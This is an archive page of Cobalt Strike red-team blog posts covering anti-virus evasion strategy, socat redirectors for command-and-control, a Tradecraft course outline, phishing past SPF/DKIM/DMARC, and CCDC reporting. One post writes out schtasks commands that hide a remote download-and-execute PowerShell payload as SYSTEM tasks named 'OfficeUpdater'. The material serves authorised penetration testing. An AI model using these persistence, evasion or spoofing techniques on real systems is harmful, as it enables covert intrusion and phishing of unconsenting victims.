Red Team Archives - Page 6 of 7 - Cobalt Strike Research and Development

What took so long? (A little product philosophy)

Cobalt Strike’s  January 8, 2014 release generates executables that evade many anti-virus products. This is probably one of the most requested features for Cobalt Strike.

Given the demand–why did it take so long for me to do something about it?

One-off anti-virus evasion is trivial. In 2012, I wrote a one-off stager for Windows Meterpreter. Few products caught it then. Few catch it now. Why? Because very few people use it. There’s no reason for an anti-virus vendor to write signatures against it.

When I use Cobalt Strike–I always bring a collection of private scripts to generate artifacts when I need them. I’ve never had a problem with anti-virus. Many of my users have their own process to generate artifacts. Good stuff is available publicly too. For example, Veil is a fantastic artifact generator.

If anti-virus evasion is so trivial–why didn’t I build new artifacts into Cobalt Strike until now?

Long-term Utility

Every feature I build has to have long-term utility. I want tools that will help get into networks and evade defenses five to ten years from now.

If I built short-term features, my work would hit a local optima that I may not escape. Over time, each improvement would serve only to balance the faded utility of the old things next to it. Without maintenance, a product with short-term features would decay until it’s not useful.

Long-term focus has the opposite benefit. If I do my job right, each release is more useful to my users than any previous release. New features interact well with existing ones and all features become more useful. This sounds like common sense… but it’s not a natural course for software.

Imagine a toolset built around locating known service vulnerabilities and launching remote exploits. Seven years ago–this hypothetical toolset could rule the world. Today? This toolset’s utility would diminish with each day as it’s built for yesterday’s attack surface. Even with patchwork improvements, the best days for this kit are in the past. A few client-side attacks next to a rusty Windows 2003 rootkit creates an image of a dilapidated amusement park with one ride that still works. The world does change and sometimes these changes will obsolete what was otherwise good. At this point, it’s time to reinvent. I feel this is where we are with penetration testing tools.

Expected Life

Every time I build something–I ask, how does this give my users and I an advantage today, tomorrow, and next year? Or better put–what is the expected life of this capability?

On the offense side–a lot of our technology has a comically short expected life. Exploits are a good example of this. Once the vulnerability an exploit targets is patched–the clock starts ticking. Every day that exploit loses utility as fewer opportunities will exist to use it. I don’t build exploits and it’s not a focus of my product. A single exploit is not a long-term advantage. A team or community of exploit developers? They’re a long-term advantage. I leverage the great work in the Metasploit Framework for this. But, in terms of value add, I have to find other places to provide a long-term advantage.

What types of technologies provide a long-term advantage? Reconnaissance technologies are a long-term advantage. NMap will probably have use in the hacker’s toolbag for, at least, our lifetime. A reconnaissance tool is a life extender for your existing kit of attack options. A three-year old Internet Explorer exploit isn’t interesting—except when a reconnaissance technology helps you realize that your target is vulnerable to it. This is why I put so much effort into Cobalt Strike’s System Profiler. The System Profiler helps my users squeeze more use out of the client-side exploits in the Metasploit Framework.

Can you think of other technologies that provide a long-term advantage? Remote Administration Payloads. Meterpreter is almost ten years old. Even though it’s gained features—the Windows implementation is the same core that Skape put together a long time ago. Any effort to make post-exploitation better will pay dividends to users many years from now. So long as there’s a way to fire a payload and get it on a system–it has utility. Well, almost. There’s one pain point to this.

The Big Hunt

On the offensive side–we are in the middle of a shift. My ass was kicked by it three years ago. If you haven’t had your ass kicked by this yet–it’s coming, I promise. What’s this offensive ass kicking shift? It’s pro-active network security monitoring as a professional focus and the people who are getting good at it. Our tools are not ready for this. Our tools assume we have the freedom to get out of a network and communicate as much as we like through one channel. These assumptions hold in some cases, but they break in high security environments. What’s the next move? I’ll give you mine.

I’ve built a multi-protocol payload with ways to control its chattiness, flexibility to use redirectors, peer-to-peer communication to limit my egress points, and in a pinch–the ability to tunnel other tools through it. Why did I do this? If I can’t get out of a network with my existing tools–I’m out of the game. If I can’t maintain a stable lifeline into my target’s network–I’m out of the game. If all of my compromised systems phone home to one system–I’m easy to spot and take out of the game.

We had a free pass to use a compromised network without contest. This is coming to an end. Sophisticated attackers evolved their communication methods years ago. We need tools that provide real stealth if we’re going to continue to claim to represent a credible threat.

I work on stealth communication with Beacon, because I see a long-term benefit to this work. I see Browser Pivoting as a technique with a long-term benefit as well. Two-factor authentication hit an adoption tipping point last year and it will disrupt our favored ways to get at data and demonstrate risk. Browser Pivoting is a way to work in this new world. When I look at the offensive landscape, I see no lack of problems to solve.

Anti-virus Evasion – Revisited

What’s a problem that I didn’t touch, because of the short life expectancy of any one solution? I didn’t want to build a public artifact collection to get past anti-virus.

I remember when the US pen tester community became aware of Hyperion. Researchers from wrote a paper on a novel way to defeat any anti-virus sandbox. The technique? Encrypt a payload with a weak key and embed it into an executable with a stub of code to brute force the key. Anti-virus products would give up emulating the binary before the key was brute forced–allowing the executable to pass.

This technique is a long-term advantage. Any one of us can write our own anti-virus bypass generator that uses the Hyperion technique. So long as we keep our generator and its stub to ourselves, it will last a long time. We didn’t do this though. We took the Hyperion proof-of-concept and used it as-is without changes. What happened? Eventually anti-virus vendors wrote signatures for a stub of code in the public binary and then the technique left our minds, even though it’s still valid.

Let’s go back to the original question. Why didn’t I add anti-virus evasion artifacts until now? I didn’t work on this problem because I didn’t have a sustainable plan. I do now.

I wrote an Artifact Kit. The Artifact Kit is a simple source code framework to generate executables that smuggle payloads past anti-virus. Better, the Artifact Kit is able to build DLLs, executables, and Windows dropper executables. I expect that, in the future, Artifact Kit will also build my persistence executables as well.

I updated Cobalt Strike to use the Artifact Kit to generate executables. My psexec dialogs use it. My Windows Dropper attack uses it. I even found that the Metasploit Framework’s Firefox add-on module fired with an Artifact Kit executable becomes a nice way to get a foothold on a fully patched system. This is an example of a new feature complementing existing tools and extending their life and utility.

Artifact Kit’s techniques have a limited lifetime. The more use it gets–the more likely an analyst will spend the time to write signatures and negate the utility of the Artifact Kit. One technique isn’t sustainable. What’s the plan then?

I published the source code to Artifact Kit along with different techniques to a place my customers have access to. I also provided Cortana hooks to make Cobalt Strike use any changes that I or my customers can dream up. Now, anti-virus evasion in Cobalt Strike doesn’t hinge on one technique. It’s a strategy. As soon as one kit gets burned, swap in a new one, and magically everything in the tool that uses it will work. It took some time to think up a flexible abstraction that makes sense. I’m pretty happy with what I have now.

If you’re a developer of offensive capabilities–ask a few questions before you commit to a problem. What is the shelf-life of your solution? Is there a way to extend the life of your solution–if it runs out? And, finally, does your solution have the potential to extend the life of other capabilities? These are the questions I ask to make sure my output has the most impact possible.

Obituary: Java Self-Signed Applet (Age: 1.7u51)

The Java Signed Applet Attack is a staple social engineering option. This attack presents the user with a signed Java Applet. If the user allows this applet to run, the attacker gets access to their system. Val Smith’s 2009 Meta-Phish paper made this attack popular in the penetration testing community.

Last week’s Java 1.7 update 51 takes steps to address this vector. By default, Java will no longer run self-signed applets. This free lunch is over.


A lot of pen testers use an applet signed with a self-signed code signing certificate. For a long time–this was good enough. The old dialog to run a self-signed applet wasn’t scary. And, thanks to the prevalence of self-signed applets in legitimate applications, users were already familiar with it.


Over time, Oracle added aggressive warnings to the self-signed applet dialog. These warnings didn’t stop users from running malicious self-signed applets though.


Starting with Java 1.7u51, we should not rely on self-signed Java applets in our attacks. Going forward, we will need to sign our applet attacks with a valid code signing certificate. This isn’t a bad thing to do. Signing an applet makes the user prompt much nicer. 


Even with a valid code signing certificate–it’s dangerous to assume a Java attack will continue to “always work” in social engineering engagements. Java is heavily abused by attackers. I expect more organizations will disable it in the browser altogether (when they can). We should update our social engineering process to stay relevant.

Here’s my recommendation:

Always profile a sample of your target’s systems before exploitationI wrote a System Profiler to help with this. A System Profiler is a web application that maps the client-side attack surface for anyone who visits it. Reconnaissance extends the life of all attack vectors by allowing an informed decision about the best attack for a target’s environment.

If Java makes sense for a target’s profile–use it. If Java doesn’t make sense, look at social engineering attack vectors beyond Java. The Microsoft Office Macro Attack is another good option to get a foothold. In environments that do not use application whitelisting yet, a simple Windows Dropper attack will work too.

Cloud-based Redirectors for Distributed Hacking

A common trait among persistent attackers is their distributed infrastructure. A serious attacker doesn’t use one system to launch attacks and catch shells from. Rather, they register many domains and setup several systems to act as redirectors (pivot points) back to their command and control server.


As of last week, Cobalt Strike now has full support for redirectors. A redirector is a system that proxies all traffic to your command and control server. A redirector doesn’t need any special software. A little iptables or socat magic can proxy traffic for you. Redirectors don’t need a lot of power either. You can use a cheap Amazon EC2 instance to serve as a redirector.

Here’s the socat command to forward connections to port 80 to

socat TCP4-LISTEN:80,fork TCP4:

The TCP4-LISTEN argument tells socat to listen for a connection on the port I provide. The fork directives tells socat that it should fork itself to manage each connection that comes in and continue to wait for new connections in the current process. The second argument tells socat which host and port to forward to.

Redirectors are great but you need payloads that can take advantage of them. You want the ability to stage through a redirector and have command and control traffic go through your other redirectors. If one redirector gets blocked—the ideal payload would use other redirectors to continue to communicate.

Cobalt Strike’s Beacon can do this. Here’s the new Beacon listener configuration dialog:


You may now specify which host Beacon and other payloads should stage through. Press Save and Beacon will let you specify which redirectors Beacon should call home to as well:


The Metasploit Framework and its payloads are designed to stage from and communicate with the same host. Despite this limitation these payloads can still benefit from redirectors. Simply spin up a redirector dedicated to a Meterpreter listener. Provide the address of the redirector when you create the listener.


Now, one Cobalt Strike instance, has multiple points of presence on the internet. Your Beacons call home to several hosts. Your Meterpreter sessions go through their own redirector. You get the convienence of managing all of this on one team server though.

If you want Meterpreter to communicate through multiple redirectors then tunnel it through Beacon. Use Beacon’s meterpreter command to stage Meterpreter and tunnel it through the current Beacon. This will take advantage of the redirectors you configured the Beacon listener to go through.

Schtasks Persistence with PowerShell One Liners

One of my favorite Metasploit Framework modules is psh_web_delivery. You can find it in exploits -> windows -> misc. This module starts a local web server that hosts a PowerShell script. This module also provides a PowerShell one liner to download this script and run it. I use this module all of the time in my local testing. Here’s the output of the module:


When I provide red team support at an event, persistence is something that usually falls into my lane. Sometimes, people catch my persistence when they find an EXE or DLL artifact with a recent timestamp. Ever since I started to use psh_web_delivery in my testing, I wondered if I could also use it for persistence without dropping an artifact on disk. The answer is yes.

Here’s how to do it with schtasks:

#(X86) - On User Login
schtasks /create /tn OfficeUpdaterA /tr "c:\windows\system32\WindowsPowerShell\v1.0\powershell.exe -WindowStyle hidden -NoLogo -NonInteractive -ep bypass -nop -c 'IEX ((new-object net.webclient).downloadstring('''''))'" /sc onlogon /ru System

#(X86) - On System Start
schtasks /create /tn OfficeUpdaterB /tr "c:\windows\system32\WindowsPowerShell\v1.0\powershell.exe -WindowStyle hidden -NoLogo -NonInteractive -ep bypass -nop -c 'IEX ((new-object net.webclient).downloadstring('''''))'" /sc onstart /ru System

#(X86) - On User Idle (30mins)
schtasks /create /tn OfficeUpdaterC /tr "c:\windows\system32\WindowsPowerShell\v1.0\powershell.exe -WindowStyle hidden -NoLogo -NonInteractive -ep bypass -nop -c 'IEX ((new-object net.webclient).downloadstring('''''))'" /sc onidle /i 30

#(X64) - On User Login
schtasks /create /tn OfficeUpdaterA /tr "c:\windows\syswow64\WindowsPowerShell\v1.0\powershell.exe -WindowStyle hidden -NoLogo -NonInteractive -ep bypass -nop -c 'IEX ((new-object net.webclient).downloadstring('''''))'" /sc onlogon /ru System

#(X64) - On System Start
schtasks /create /tn OfficeUpdaterB /tr "c:\windows\syswow64\WindowsPowerShell\v1.0\powershell.exe -WindowStyle hidden -NoLogo -NonInteractive -ep bypass -nop -c 'IEX ((new-object net.webclient).downloadstring('''''))'" /sc onstart /ru System

#(X64) - On User Idle (30mins)
schtasks /create /tn OfficeUpdaterC /tr "c:\windows\syswow64\WindowsPowerShell\v1.0\powershell.exe -WindowStyle hidden -NoLogo -NonInteractive -ep bypass -nop -c 'IEX ((new-object net.webclient).downloadstring('''''))'" /sc onidle /i 30

Each of these one liners assumes a 32-bit PAYLOAD.

I’m not a PowerShell developer, so the hardest part of this exercise for me was the quoting. I’ve never seen anything quite like PowerShell’s convention for escaping quotes. PowerShell includes an option to evaluate a Base64-encoded one liner. I tried to go this route, but I hit the character limit for the task I could schedule.

One interesting note–you may schedule a task for the user idle event as a non-privileged user. If you need to survive a reboot on a system that you can’t escalate on, this is an option. If you test this option–beware that Windows checks if the user is idle once every fifteen minutes or so. If you schedule an onidle event for 1 minute, don’t expect to see a session one minute later.

Tradecraft – Red Team Operations Course and Notes

A few days ago, I posted the YouTube playlist on Twitter and it’s made a few rounds. That’s great. This blog post properly introduces the course along with a few notes and references for each segment.

Tradecraft is a new nine-part course that provides the background and skills needed to execute a targeted attack as an external actor with Cobalt Strike. I published this course to help you get the most out of the tools I develop.

If you’d like to jump into the course, it’s on YouTube:

The YouTube ID of is invalid.

Here are a few notes to explore each topic in the course with more depth.

1. Introduction

The first part of tradecraft introduces the course, the Metasploit Framework, and Cobalt Strike. If you already know Armitage or the Metasploit Framework–you don’t need to watch this segment. The goal of this segment is to provide the base background and vocabulary for Metasploit Framework novices to follow this course.

To learn more about the Metasploit Framework:

Cobalt Strike:

Targeted Attacks and Advanced Persistent Threat:

  • Read Intelligence-Driven Computer Network Defense from Lockheed Martin. The process in this course maps well to the “systematic process to target and engage an adversary” presented in this paper. If you need to exercise controls that detect, deny, disrupt, degrade, or deceive an adversary–I know a product that can help 🙂
  • Watch Michael Daly’s 2009 USENIX talk, The Advanced Persistent Threat. This talk pre-dates the marketing bonanza over APT actors and their work. This is a common sense discussion of the topic without an agenda. Even though it’s from 2009, the material is spot on.
  • Watch Kevin Mandia’s 2014 RSA talk, State of the Hack: One Year After the APT1 Report. This is a 20 minute summary of the APT1 report published by Mandiant in February 2013.

Advanced Persistent Threat Campaigns

These actors managed to compromise thousands of hosts and steal data from them for years, without detection. Cobalt Strike’s aim is to augment the Metasploit Framework to replicate these types of threats.

2. Basic Exploitation (aka Hacking circa 2003)

Basic Exploitation introduces the Metasploit Framework and how to use it through Cobalt Strike. I cover how to pick a remote exploit, brute force credentials, and pivot through SSH. I call this lecture “hacking circa 2003” because remote memory corruption exploits have little use in an environment with a handle on patch management. Again, if you have strong Metasploit-fu, you may skip this lecture.

A few notes:

  • I dismiss remote memory corruption exploits as a dated vector; but don’t discount the remote attack surface. HD Moore and Val Smith‘s Tactical Exploitation is one of the best resources on how to extract information from exposed services. First published in 2007, it’s still relevant. Watch the video and read the paper.
  • I used the Metasploitable 2 Virtual Machine for the Linux demonstrations in this segment.

3. Getting a Foothold

This segment introduces how to execute a targeted attack with Cobalt Strike. We cover client-side attacks, reconnaissance, and crafting an attack package.

To go deeper into this material:

4. Social Engineering

The fourth installment of tradecraft covers how to get an attack package to a user. The use of physical media as an attack vector is explored as well as watering hole attacks, one off phishing sites, and spear phishing.

  • Watch Advanced Phishing Tactics by Martin Bos and Eric Milam. This talk puts together a lot of concepts needed for a successful phish. How to harvest addresses, develop a good pretext, and create a phishing site.
  • Advanced Threat actors favor spear phishing as an access vector. I’d point you to one source, but since this concept has such market buzz, there are a lot of whitepapers on this topic. I suggest a google search and reading something from a source you consider credible.

5. Post Exploitation with Beacon

By this time, you know how to craft and deliver an attack package. Now, it’s time to learn how to setup Beacon and use it for asynchronous and interactive operations.

6. Post Exploitation with Meterpreter

This video digs into interactive post-exploitation with Meterpreter. You will learn how to use Meterpreter, pivot through the target’s browser, escalate privileges, pivot, and use external tools through a pivot.

Privilege Escalation

7. Lateral Movement

This installment covers lateral movement. You’ll learn how to enumerate hosts and systems with built-in Windows commands, steal tokens, interrogate hosts to steal data, and use just Windows commands to compromise a fully-patched system by abusing trust relationships. My technical foundation is very Linux heavy, I wish this lecture existed when I was refreshing my skillset.

Token Stealing and Active Directory Abuse

Recovering Passwords 

Pass the Hash

8. Offense in Depth

This segment dissects the process to get a foothold into the defenses you’ll encounter. You’ll learn how to avoid or get past defenses that prevent message delivery, prevent code execution, and detect or stop command and control.

Email Delivery

Anti-virus Evasion

  • If you like, you may use Cortana to force Armitage or Cobalt Strike to use an AV-safe executable of your choosing. You have the option to select an EXE with Cobalt Strike’s dialogs. This process allows you to automate the process of generating a new automatically for your payload parameters.
  • Also, check out Veil, a framework for generating anti-virus safe executables.
  • Here’s a blog post by on how to modify a client-side exploit to get past an anti-virus product

Payload Staging

Offense in Depth

9. Operations

This last chapter covers operations. Learn how to collaborate during a red team engagement, manage multiple team servers from one client, and load scripts to help you out.


The online course does not have dedicated labs per se. I have two sets of labs I run through with this material.

When I’m hired to teach, I bring a Windows enterprise in a box. I have my students conduct several drills to get familiar with the tools. I then drop them into my enterprise environment and assign goals for them to go through.

I also have a DVD with labs that map to the old version of this course. This DVD has two Linux target virtual machines and an attack virtual machine. Nothing beats setting up a Windows environment to play with these concepts, but this DVD isn’t a bad starter. If you see me at a conference, ask for one.

Email Delivery – What Pen Testers Should Know

I get a lot of questions about spear phishing. There’s a common myth that it’s easy to phish. Start a local mail server and have your hacking tool relay through it. No thinking required.

Not quite. Email is not as open as it was ten years ago. Several standards exist to improve the security of email delivery and deter message spoofing. Fortunately–these standards are a band-aid at best. They’re not evenly implemented across all networks and with a little knowledge of how the system works–you can avoid triggering these protections.


SMTP is the Simple Mail Transfer Protocol. It’s one of the oldest internet protocols still in use. This is the protocol mail servers use to relay email to each other. SMTP runs on port 25.

Each domain that receives email has a mail server designated to receive these messages. A domain owner designates this mail server through an MX or mail exchanger record in its DNS zone file.

Anyone may query a domain’s MX record to find the server that receives email. Here’s how to do it with dig:

# dig +short MX

From the query above, we can see that accepts mail through these five servers. Anyone in the world may connect to one of these servers on port 25 and attempt to relay a message to a user.

The SMTP protocol is easy to work with (S stands for Simple, right?) Here’s what an SMTP exchange looks like:

# telnet 25
Connected to
Escape character is '^]'.
220 mint ESMTP Sendmail 8.14.3/8.14.3/Debian-9.1ubuntu1; Thu, 3 Oct 2013 15:37:30 -0400
     ; (No UCE/UBE) logging access from: [](FAIL)-[]
250 mint Hello [], pleased to meet you
MAIL FROM: <[email protected]>
250 2.1.0 <[email protected]>... Sender ok
RCPT TO: <[email protected]>
250 2.1.5 <[email protected]>... Recipient ok
354 Enter mail, end with "." on a line by itself
From: "The Dude" <[email protected]>
To: "Lou User" <[email protected]>
Subject: Haaaaaay!
This is message content.
250 2.0.0 r93JbUN2002491 Message accepted for delivery
221 2.0.0 mint closing connection
Connection closed by foreign host.

The HELO and EHLO command starts a conversation with the mail server. The HELO message does nothing. The EHLO message asks the mail server to list its abilities. This information tells the SMTP client whether or not a feature (such as STARTTLS) is supported.

The MAIL FROM command tells the mail server who sends this message. This is akin to a return address on an envelope. If a mail server encounters an error it will send a non-delivery notice to the sender. This value is not part of the message the user sees.

The RCPT TO command tells the mail server who to deliver the message to. This information does not need to match the email headers themselves. This value is not part of the message the user sees.

DATA tells the mail server that we’re ready to send the message. The mail server will assume that anything after DATA is message content. This message content will contain the headers and encoded content that the user receives. An SMTP client sends a single period to end this part of the conversation.

If all goes right, the mail server will return a message id and state that the message is in the queue. When the user receives our message, here’s what they see:


Message Content

This blog post focuses on SMTP and I consider a full discussion of email messages and their format out of scope for this post. In short though, a message consists of content and headers.

Headers tell the mail reader who the message is from, who it is to, its subject, and other information. Here are a few typical headers:

From: "Raphael Mudge" <[email protected]>
To: "Scumbag Sales People" <[email protected]>
Subject: Do you do reseller discounts?

SMTP is a plaintext protocol. All email is sent as ASCII text. There are ways to encode binary attachments and rich content messages. For our purposes, message content follows the headers. We can skip the message encoding and specify a message as-is:

Dear Sales Team,
I have a client that wants to buy your software. I will issue a purchase order no 
matter what your reply is. Do you offer reseller discounts?


Purchasing Person

Now that you know what a message looks like, I suggest that you open a terminal and try to send yourself a message by hand. Look up your email domain’s SMTP server with the dig command. Use telnet or nc to connect to port 25 of the mail server. Go through the HELO, MAIL FROM, RCPT TO, and DATA steps. Paste in a message. Type period. Press enter twice. Wait one minute. Then go check your email.

If your message ends up in your spam folder–read the rest of this post for reasons why.

Who connects to SMTP servers?

Mail servers cater to two types of users.

Mail servers receive connections from systems that want to relay a message to a user in the mail server’s domain. If I run a mail server for, I must accept that anyone, anywhere on the internet, may connect to me to relay a message to a user.

This last statement is important–Any system on the internet may connect to a mail server to relay a message to one of its users. This system does not have to be a mail server.

The RCPT TO command indicates who the message is for. If the mail server is an open relay it will accept a message for anyone and relay it to their server. Open relays are rare now because spammers abuse(d) them so much. Most likely the mail server is not an open relay. You will need to specify a user in the mail server’s domain when you use RCPT TO.

Mail servers must also cater to authorized users who want to send messages. An authorized user may provide any address for RCPT TO and the mail server will queue it for delivery.

How does one become an authorized user? It depends on the server. Some servers will assume you’re authorized based on the address you connect from. Others will require you to authenticate before they will relay email for you.

Message Rejection

With all of that background out of the way–let’s talk about reasons why a mail server may reject your message. There are quite a few.

The MAIL FROM message indicates who the message is from. If I connect to a mail server and I claim to have a message from one of its users–the mail server will likely reject it. If I am relaying a message to a user on the mail server’s domain, I must claim the message is from a user on another domain.

Some mail servers will reject messages from a system with an internet address that does not resolve to a fully qualified domain name.

If your IP address is associated with an internet blacklist–expect mail servers to reject messages from you. For example, when I try to send a message through a tethered internet connection:

# telnet 25
Connected to
Escape character is '^]'.
553 5.7.1 [BL21] Connections will not be accepted from, because the ip
      is in Spamhaus's list; see
Connection closed by foreign host.

Sender Policy Framework

When I connect to a mail server and send the MAIL FROM command–I am claiming the message is from the address I provide. By default, SMTP does not have a way to verify this statement. It takes what I say at face value.

Sender Policy Framework (or SPF) is a standard to verify this statement. To take advantage of SPF, the owner of a domain creates a DNS TXT record that states which hosts may send email for their domain.

When I connect to a mail server and try to relay a message–the mail server has the opportunity to check the SPF record of the domain I claim the message is from in the MAIL FROM command. If an SPF record exists and my IP address is not in the record–the mail server may reject my message. SPF does not verify the message’s From header.

It takes two for SPF to work. The mail server that receives a message must verify the SPF record. The domain owner must create an SPF record as well. Without both of these elements in place, there is no protection.

To lookup the SPF record for a domain, use:

# dig +short TXT
"v=spf1 ip4: ip4: ip4: 
 ip4: ip4: a mx ?all"


SPF does not verify message content. DKIM is the standard to verify message content. DKIM is DomainKeys Identified Mail. This is a mechanism for a mail server to sign a message and its contents to confirm that it originated from that server. The signature is added to a message as a DKIM-Signature header.

The DKIM-Signature header is added to a message by a mail server. The DKIM header includes the domain the message is signed for. Another mail server may query the domain’s public key (via DNS) and verify that the message originated from that domain.

By itself, DKIM has no teeth. The lack of a DKIM header does not mean a message is valid or invalid. Large webmail providers, like Google, have made deals with owners of highly phished domains to check for a DKIM signature and spam a message if it’s not present or verifiable. This protection requires tight cooperation between a domain owner and a mail provider.


Tight cooperation between all email receivers and senders is not a tractable solution to stop email spoofing. Domain-based Message Authentication, Reporting and Conformance (or DMARC) is a standard that allows a domain owner to signal that they use DKIM and SPF. DMARC also allows a domain owner to advise other mail servers about what they should do when a message fails a check.

To check if a domain uses DMARC, use dig to lookup a TXT record for

$ dig +short TXT
 "v=DMARC1\; p=none\; rua=mailto:[email protected]"

Check if the domain you will send a message from uses DMARC before you phish. Remember, DMARC only works if the mail server that receives the message checks for the record and acts on it.

Much like SPF, DMARC requires a domain owner to opt-in to the protection. If they don’t, there is no protection against spoofing. Likewise, if a mail server does not check for DMARC, SPF, or DKIM there is no protection for the users on that domain either.

Accepted Domains

Without DMARC, SPF, and DKIM it’s difficult to discard a message as a spoof. There’s one exception to this. Your client should have a good handle on which domains they own. They should also have protections in place to prevent an outsider (you) from emailing their users with a message that spoofs their domain.

One mechanism to stop outsider’s spoofing a local user is the Accepted Domains feature in Microsoft Exchange. If you can spoof your customer’s domain as an external actor through their mail server–I would consider this a finding.

Spam Traps

Let’s say your message gets through the initial checks. It’s still at risk of finding its way to the spam folder. Different mail servers and tools check a lot of factors to decide if a message is spam or dangerous. Here are a few to think about:

  • How old is the domain you’re phishing from? If you send a phish from a domain registered last week–it’s possible a mail server may flag it as spam. Older domains are more trustworthy.
  • Does your message contain a link to an IP address? Sometimes a link to an IP address looks suspicious.
  • Does your message link to a URL with a different URL? For example–does your message contain a link that looks like this:
    <a href=""></a>

    This is suspicious.

  • Pay attention to your attachment. Most mail servers block known executable files (e.g., .exe, .pif, .scr, etc.) out of the box. Suspicious attachments won’t help your spam score.
  • Make sure your message content is not broken. Missing HTML close tags, missing headers, and other errors are potential signs of spam. I prefer to repurpose an existing email message for my phishes. An email client does a better job generating valid messages than a hacking tool ever will.
  • Check that your MAIL FROM address matches the email in the From header in your message. Some webmail providers will flag your message as spam if these values do not match. You may not have the same problem with corporate email infrastructure.

Circumventing Defenses

So far, in this post, I’ve raised your awareness of message delivery, how it works, and what stops it. If you’re planning to spoof a message from another domain:

  • Check if the domain has an SPF, DMARC, or DKIM record. The mail server that receives your phish has to verify these records–but if they don’t exist, there’s nothing for it to verify
  • Try to send your message to an inbox you control through email infrastructure that is similar to your clients. For example, many corporations use Outlook and Exchange. Microsoft Outlook has its own junk filter. Email yourself at your corporate address to see how Microsoft’s junk filter processes your message content.
  • Reconnaissance is your friend. Send a message to a non-existent user at the domain you’re trying to send a phish to. Make sure MAIL FROM is an address that you control. If you’re lucky, you will get a non-delivery notice. Inspect the headers from the non-delivery notice to see your spam score, SPF score, and other indicators about your message. If you get a non-delivery notice–it’s likely that your message passed other pre-delivery checks (a local junk filter may still send your message to the spam folder though).

For Cobalt Strike users, here’s how this advice maps to the built-in spear phishing tool:


If all else fails–go legitimate. There’s no hard requirement that you must phish from a spoofed domain. Try to register a phishing domain that relates to a generic pretext. Create the proper SPF, DKIM, and DMARC records. Use this domain when you need something that looks legitimate. There’s nothing wrong with this approach–so long as your message makes it to the target user and it gets clicks.

Finally, don’t get discouraged when you can’t get a spoofed message to your Gmail account. Large webmail providers are early adopters and consumers of standards such as DKIM, SPF, and DMARC. It’s possible that your corporate pen testing client hasn’t heard of this stuff. Once you complete a successful phishing engagement–you can suggest these things in your report.

Telling the Offensive Story at CCDC

The 2013 National CCDC season ended in April 2013. One topic that I’ve sat on since this year’s CCDC season ended is feedback. Providing meaningful and specific feedback on a team-by-team basis is not easy. This year, I saw multiple attempts to solve this problem. These initial attempts instrumented the Metasploit Framework to collect as many data points as possible into a central database. I applaud these efforts and I’d like to add a few thoughts to help them mature for the 2014 season.

Instrumentation is good. It provides a lot of data. Data is good, but data is dangerous. Too much data with no interpretation is noise. As there are several efforts to collect data and turn it into information, I’d like to share my wish list of artifacts that I’d like to see students get at the end of a CCDC event.

1) A Timeline

A timeline should capture red team activity as a series of discrete events. Each event should contain:

  • An accurate timestamp
  • A narrative description of the event
  • Information to help positively identify the activity (e.g., the red IP address)
  • The blue asset involved with the event

A complete timeline is valuable as it allows a blue team to review their logs and understand what they can and can’t observe. If they’re able to observe activity, but didn’t act on an event, then the team knows they have an operational issue with how they consume and act on their data.

If a team can’t find a red event in their logs, then they have a blind spot and they need to put in place a solution to close this gap.

In a production environment, the blue team has access to their logs on a day-to-day basis. In an exercise, the blue team only has access to the exercise network during the exercise. I recommend that blue teams receive a red team timeline and that they also get time after the competition to export their logs for review during the school year.

These red and blue log artifacts would provide blue teams a great tool to understand, on their own, how they can improve. Access to these artifacts would also allow students to learn log analysis and train throughout the year with real data.

Cobalt Strike’s activity report is a step in this direction. It interprets data from the Metasploit Framework and data collected by Cobalt Strike to create a timeline and capture this information. There are a few important linkages missing though. For example, if a compromised system connects to a stand-alone handler/listener, there is no information to associate that new session with the behavior that led to it (e.g., did someone task a Beacon? did the user click on a client-side attack? etc.).

2) An Asset Report

An asset report describes, on an asset-by-asset basis, how the red team views the asset and what they know about it.

Most penetration testing tools offer this capability. Core Impact, Metasploit Pro, and Cobalt Strike generate reports that capture all known credentials, password hashes, services, vulnerabilities, and compromises on a host-by-host basis.

These reports work and they are a great tool for a blue team to understand which systems are their weakest links.

A challenge with these reports is that a CCDC red team does not use a single system to conduct activity. Some red tea members run attack tools locally, others connect to multiple team servers to conduct different aspects of the engagement. Each system has its own view of what happened during the event. I’m taking steps to manage this problem with Cobalt Strike. It’s possible to connect to multiple team servers and export a report that intelligently combines the point of view of each server into one picture.

I saw the value of the asset report at Western Regional CCDC. I spent the 2-3 hour block of networking time going over Cobalt Strike’s hosts report with different blue teams. Everyone wanted me to scroll through their hosts. In the case of the winning team, I didn’t have to say anything. The students looked at their report, drew their conclusions, and thanked me for the helpful feedback. The hosts report gave the blue teams something concrete to judge whether they were too complacent or too paranoid. Better, this information helped them understand how close we were to making things much worse for them.

Whether this type of report comes from a penetration testing tool or these competition-specific solutions under development, I recommend that red teams provide an asset-by-asset report. The students I interacted with were able to digest this information quickly and use it to quickly answer some of their open questions.

3) A Vulnerability Report

During a CCDC event, the red team only uses one or two exploits to get a toehold. We then leverage credentials for the rest of the event. Still, I’m often asked “which exploits did you use?” A report of which vulnerabilities were used will answer these questions.

4) A Narrative

The item that completes the feedback is the narrative. The narrative is the red team member telling the story of what they did at a very high level. A short narrative goes a long way to bring life to the data the blue team will have to sift through later.

I believe telling stories is something CCDC red teams do well. At a typical CCDC debrief, red team members will share their favorite moments or wins during the event. Without context, this story is anecdotal. Combined with the data above, it’s something actionable. Now the blue teams know what they should look for when they’re analyzing the log files.

The narrative provides blue teams with a starting point to understand what happened. The data we provide them will give them the opportunity to take that understanding to the next level.

5) Sizzle

During a security assessment, I’m not doing my job if I just explain what I did. It’s my job to ally with my blue counterparts and actively sell our client’s leadership on the steps that will improve their security posture. When communication with non-technical folks, a little sizzle goes a long ways. I like to record my screen during an engagement. At the end of the engagement, I cut the interesting events from the recording and create short videos to show the high points. Videos make it easier to understand the red perspective. If a video involves an event that both the red team and blue team experienced together, I find watching the video together creates a sense of a shared experience. This can go a long way towards building rapport (a key ingredient in that building an alliance step).

To record my screen, I use ScreenFlow for MacOS X. 20 hours of screen recording (no audio) takes up a few gigabytes, nothing unreasonable.

In this post, I listed five artifacts we can provide blue teams to better tell the offensive story. I’ve pointed at examples where I could. Beware though, if actionable feedback were as easy as clicking a button to generate a report, this blog post wouldn’t exist. Reporting is challenging in an environment where 20 experts are actively participating in 10 engagements with multiple toolkits. As different parties build data collection platforms, I hope to see an equal effort towards data interpretation. These artifacts are some of the things I’d like to see come out of the data. What artifacts do you think would help?

Goading Around Firewalls

